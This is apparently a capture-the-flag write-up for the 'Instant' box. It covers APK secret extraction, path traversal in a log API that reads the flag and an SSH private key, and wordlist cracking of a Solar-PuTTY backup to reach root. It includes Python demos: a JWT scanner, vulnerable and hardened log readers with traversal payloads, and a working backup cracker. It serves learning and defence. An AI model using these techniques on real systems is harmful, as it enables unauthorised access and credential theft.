💰Instant

Nmap recon


A bit of directory fuzzing, as always.

Have a look at the web page.

Nice, it lets us download an APK called instant.apk.

Unpack it with apktool.

Let's look around for something interesting.

Inside the second file there's a hard-coded URL and a JWT. A token baked into a shipped client is as good as public: anyone who downloads the APK has it.
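The secret hunt above, as an added example that is not part of the original writeup: a small scanner that walks an apktool output tree, pulls out hard-coded URLs and JWT-shaped strings, and decodes the token's header and payload without verifying the signature so you can see the claims (role, issuer, expiry) before replaying it. The directory layout, file contents, hostname `api.example.test` and the signing secret used to build the demo token are all constructed here and are not from instant.apk.

```python
"""Scan an apktool output directory for hard-coded URLs and JWTs.

Added example, not the writeup's own tooling. Every path, string and
token below is constructed for the demo; nothing is taken from the
real APK.
"""
import base64
import hashlib
import hmac
import json
import os
import re
import tempfile

URL_RE = re.compile(r"https?://[A-Za-z0-9._~:/?#\[\]@!$&'()*+,;=%-]+")
# Three base64url segments joined by dots; a JSON header always encodes to 'eyJ'.
JWT_RE = re.compile(r"eyJ[A-Za-z0-9_-]+\.[A-Za-z0-9_-]+\.[A-Za-z0-9_-]+")


def _b64url_decode(segment: str) -> bytes:
    """base64url without padding, as used in JWTs."""
    return base64.urlsafe_b64decode(segment + "=" * (-len(segment) % 4))


def decode_jwt_unverified(token: str) -> dict:
    """Read header and payload only. The signature is deliberately ignored:
    this tells you what the token claims, not whether the server accepts it."""
    header, payload, _signature = token.split(".")
    return {
        "header": json.loads(_b64url_decode(header)),
        "payload": json.loads(_b64url_decode(payload)),
    }


def scan_tree(root: str) -> dict:
    """Walk the unpacked APK and collect URLs and JWTs per file (relative path)."""
    found = {"urls": {}, "jwts": {}}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            try:
                with open(path, encoding="utf-8", errors="ignore") as fh:
                    text = fh.read()
            except OSError:
                continue
            rel = os.path.relpath(path, root)
            urls = sorted(set(URL_RE.findall(text)))
            jwts = sorted(set(JWT_RE.findall(text)))
            if urls:
                found["urls"][rel] = urls
            if jwts:
                found["jwts"][rel] = jwts
    return found


def make_demo_token(secret: bytes = b"demo-signing-secret") -> str:
    """Constructed HS256 token for the demo. The secret and claims are invented."""
    def enc(obj) -> str:
        raw = json.dumps(obj, separators=(",", ":")).encode()
        return base64.urlsafe_b64encode(raw).rstrip(b"=").decode()

    signing_input = enc({"alg": "HS256", "typ": "JWT"}) + "." + enc(
        {"id": 1, "role": "Admin", "iss": "demo-wallet"}
    )
    sig = hmac.new(secret, signing_input.encode(), hashlib.sha256).digest()
    return signing_input + "." + base64.urlsafe_b64encode(sig).rstrip(b"=").decode()


def build_demo_tree() -> tuple:
    """Write a tiny fake apktool output tree (constructed) and return (root, token)."""
    root = tempfile.mkdtemp(prefix="apktool_demo_")
    token = make_demo_token()
    files = {
        "smali/com/demo/NetworkAdapter.smali": (
            ".method public constructor <init>()V\n"
            '    const-string v0, "http://api.example.test/api/v1/"\n'
            '    const-string v1, "' + token + '"\n'
            "    return-void\n"
            ".end method\n"
        ),
        "res/values/strings.xml": (
            "<resources>\n"
            '    <string name="privacy_url">https://example.test/privacy</string>\n'
            "</resources>\n"
        ),
        "AndroidManifest.xml": '<manifest package="com.demo.wallet"/>\n',
    }
    for rel, content in files.items():
        path = os.path.join(root, rel)
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "w", encoding="utf-8") as fh:
            fh.write(content)
    return root, token


if __name__ == "__main__":
    root, _ = build_demo_tree()
    hits = scan_tree(root)
    for rel, tokens in hits["jwts"].items():
        for t in tokens:
            print(rel, json.dumps(decode_jwt_unverified(t)["payload"]))
    for rel, urls in hits["urls"].items():
        print(rel, urls)
```

Point `scan_tree` at the real apktool output directory instead of the demo tree; `decode_jwt_unverified` is what tells you whether the token carries an elevated role or an expiry you should hurry for.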

Well, let's use those...

Let's try it with Burp.

I wonder if this API endpoint is documented on Swagger...

Now we have a fairly full view of the API calls; let's try to enumerate users.

The only useful one seems to be shirohige. Let's look a bit more...

It seems that the log files are referenced directly by file name, so the user-supplied name ends up in a filesystem path. Let's check some more API calls to see if we can exploit this.

Nice.

Time to directory-traverse our way to the flag!

Easy enough.
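The bug being abused here, as an added example that is not part of the original writeup: a "read this log by name" handler that joins the client-supplied name straight onto the log directory, next to a hardened version that resolves the path and refuses anything outside the directory. The constructed layout puts a flag file and an SSH private key one level above the log directory, which is the shape of the reads this writeup does; the real endpoint, parameter name and paths on the box are not reproduced.

```python
"""Path traversal in a log reader: vulnerable handler vs. hardened handler.

Added example, not code from the box. All file names and contents are
constructed for the demo.
"""
import os
import tempfile


def read_log_vulnerable(log_dir: str, log_file_name: str) -> str:
    """Joins the user-supplied name straight onto the log directory.
    '../' segments walk out of it, and os.path.join discards log_dir entirely
    when log_file_name is absolute."""
    with open(os.path.join(log_dir, log_file_name), encoding="utf-8") as fh:
        return fh.read()


def read_log_hardened(log_dir: str, log_file_name: str) -> str:
    """Resolve the candidate path (symlinks included) and require it to sit
    under the real log directory before opening it."""
    base = os.path.realpath(log_dir)
    candidate = os.path.realpath(os.path.join(base, log_file_name))
    if os.path.commonpath([base, candidate]) != base:
        raise PermissionError(f"path escapes log directory: {log_file_name!r}")
    with open(candidate, encoding="utf-8") as fh:
        return fh.read()


def build_demo_fs() -> dict:
    """Constructed layout: <root>/home/user/logs is what the API serves; the
    flag and the SSH key live outside it."""
    root = tempfile.mkdtemp(prefix="traversal_demo_")
    files = {
        "home/user/logs/1.log": "GET /api/v1/health 200\n",
        "home/user/user.txt": "FLAG{constructed-demo-flag}\n",
        "home/user/.ssh/id_rsa": (
            "-----BEGIN OPENSSH PRIVATE KEY-----\n"
            "(constructed placeholder, not a real key)\n"
            "-----END OPENSSH PRIVATE KEY-----\n"
        ),
    }
    for rel, content in files.items():
        path = os.path.join(root, rel)
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "w", encoding="utf-8") as fh:
            fh.write(content)
    return {"root": root, "log_dir": os.path.join(root, "home", "user", "logs")}


def traversal_results(fs: dict) -> dict:
    """Feed the same payloads to both handlers and record what each returns."""
    payloads = {
        "flag": "../user.txt",
        "id_rsa": "../.ssh/id_rsa",
        # absolute path: os.path.join throws the base directory away
        "absolute": os.path.join(fs["root"], "home", "user", "user.txt"),
    }
    out = {}
    for label, payload in payloads.items():
        out[label] = {"vulnerable": read_log_vulnerable(fs["log_dir"], payload).strip()}
        try:
            read_log_hardened(fs["log_dir"], payload)
            out[label]["hardened"] = "allowed"
        except PermissionError:
            out[label]["hardened"] = "blocked"
    # a legitimate request still works through the hardened handler
    out["legit"] = read_log_hardened(fs["log_dir"], "1.log").strip()
    return out


if __name__ == "__main__":
    for label, result in traversal_results(build_demo_fs()).items():
        print(label, result)
```

The check is done on the resolved path, not on the raw string, because rejecting the literal `..` is not enough: URL-encoded variants, symlinks inside the log directory and absolute paths all get past a string filter and still end up outside the directory.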

Let’s try some more...

But why not exfiltrate the id_rsa key directly, so we can log in straight away?

Let's save it and SSH into the machine.

Let's go.

Time to find something to privesc with.

No SUID files, no crontab, no capabilities, but there are some Python processes and two open ports, 8888 and 8808, used by Swagger; nothing more.

Looking around a bit more, there's a Solar-PuTTY session backup.

Let's download the file and decrypt it so we can use it.

scp -i insta_id_rsa shirohige@instant.htb:/opt/backups/Solar-PuTTY/session-backup.dat ./

I found a really good script to decrypt the file, SolarPuttyDecryptor.py.

Using the rockyou wordlist it's easy to recover the encryption password and decrypt the file.

python3 SolarPuttyDecryptor.py ../sessions-backup.dat -wl /usr/share/wordlists/rockyou.txt
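What that wordlist run is doing under the hood, as an added example that is not the SolarPuttyDecryptor.py script used above: derive a key from each candidate password, try to decrypt the backup, and accept the first candidate that yields valid padding and well-formed JSON. The container layout coded here (base64 of a 24-byte salt, a 16-byte IV and AES-256-CBC ciphertext, key from PBKDF2-HMAC-SHA1 with 1000 iterations) is the one I understand the public Solar-PuTTY decryptor scripts to implement; treat it as an assumption and check the offsets against a file you can already decrypt. It needs the `cryptography` package. The sample session, password and wordlist are constructed here, not taken from the box.

```python
"""Wordlist attack on a Solar-PuTTY session backup.

Added example, not the writeup's script. Container layout is an assumption
(see the lead-in); the test vector is generated locally with the inverse
operation, so nothing here comes from the real session-backup.dat.
"""
import base64
import hashlib
import json
import os

from cryptography.hazmat.primitives import padding
from cryptography.hazmat.primitives.ciphers import Cipher, algorithms, modes

SALT_LEN, IV_LEN, KEY_LEN, ITERATIONS = 24, 16, 32, 1000  # assumed layout


def derive_key(password: str, salt: bytes) -> bytes:
    """PBKDF2-HMAC-SHA1, 1000 rounds, 32-byte key (assumed to match the tool)."""
    return hashlib.pbkdf2_hmac("sha1", password.encode("utf-8"), salt, ITERATIONS, KEY_LEN)


def decrypt_backup(blob_b64: str, password: str):
    """Return the decoded session JSON, or None if the password is wrong."""
    raw = base64.b64decode(blob_b64)
    salt = raw[:SALT_LEN]
    iv = raw[SALT_LEN:SALT_LEN + IV_LEN]
    ciphertext = raw[SALT_LEN + IV_LEN:]
    decryptor = Cipher(algorithms.AES(derive_key(password, salt)), modes.CBC(iv)).decryptor()
    padded = decryptor.update(ciphertext) + decryptor.finalize()
    unpadder = padding.PKCS7(128).unpadder()
    try:
        plain = unpadder.update(padded) + unpadder.finalize()
    except ValueError:
        return None  # wrong key: PKCS7 padding is almost always invalid
    try:
        return json.loads(plain.decode("utf-8"))
    except (UnicodeDecodeError, json.JSONDecodeError):
        return None  # valid padding by chance (~1/256), but garbage content


def crack_backup(blob_b64: str, wordlist):
    """Try every candidate in wordlist; return (password, session) or (None, None)."""
    for candidate in wordlist:
        candidate = candidate.rstrip("\r\n")
        session = decrypt_backup(blob_b64, candidate)
        if session is not None:
            return candidate, session
    return None, None


def encrypt_backup_for_demo(session: dict, password: str) -> str:
    """Inverse of decrypt_backup, used only to build a constructed test vector."""
    salt, iv = os.urandom(SALT_LEN), os.urandom(IV_LEN)
    padder = padding.PKCS7(128).padder()
    padded = padder.update(json.dumps(session).encode("utf-8")) + padder.finalize()
    encryptor = Cipher(algorithms.AES(derive_key(password, salt)), modes.CBC(iv)).encryptor()
    return base64.b64encode(salt + iv + encryptor.update(padded) + encryptor.finalize()).decode()


# Constructed sample: the field names mimic a session export but are invented.
DEMO_SESSION = {
    "Sessions": [{"SessionName": "demo-box", "Ip": "10.0.0.5", "Port": 22}],
    "Credentials": [{"Username": "root", "Password": "constructed-demo-pass"}],
}
DEMO_WORDLIST = ["123456", "password", "iloveyou", "sunshine1", "qwerty"]

if __name__ == "__main__":
    blob = encrypt_backup_for_demo(DEMO_SESSION, "sunshine1")
    pw, session = crack_backup(blob, DEMO_WORDLIST)
    print("password:", pw)
    print(json.dumps(session, indent=2))
```

Against the real file, pass `open("/usr/share/wordlists/rockyou.txt", encoding="latin-1")` as the wordlist (rockyou is not clean UTF-8) and the file's base64 contents as the blob; the JSON that comes back is where the saved credentials live.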

Log in again as shirohige and use su with the recovered password to gain root.

And we're done.
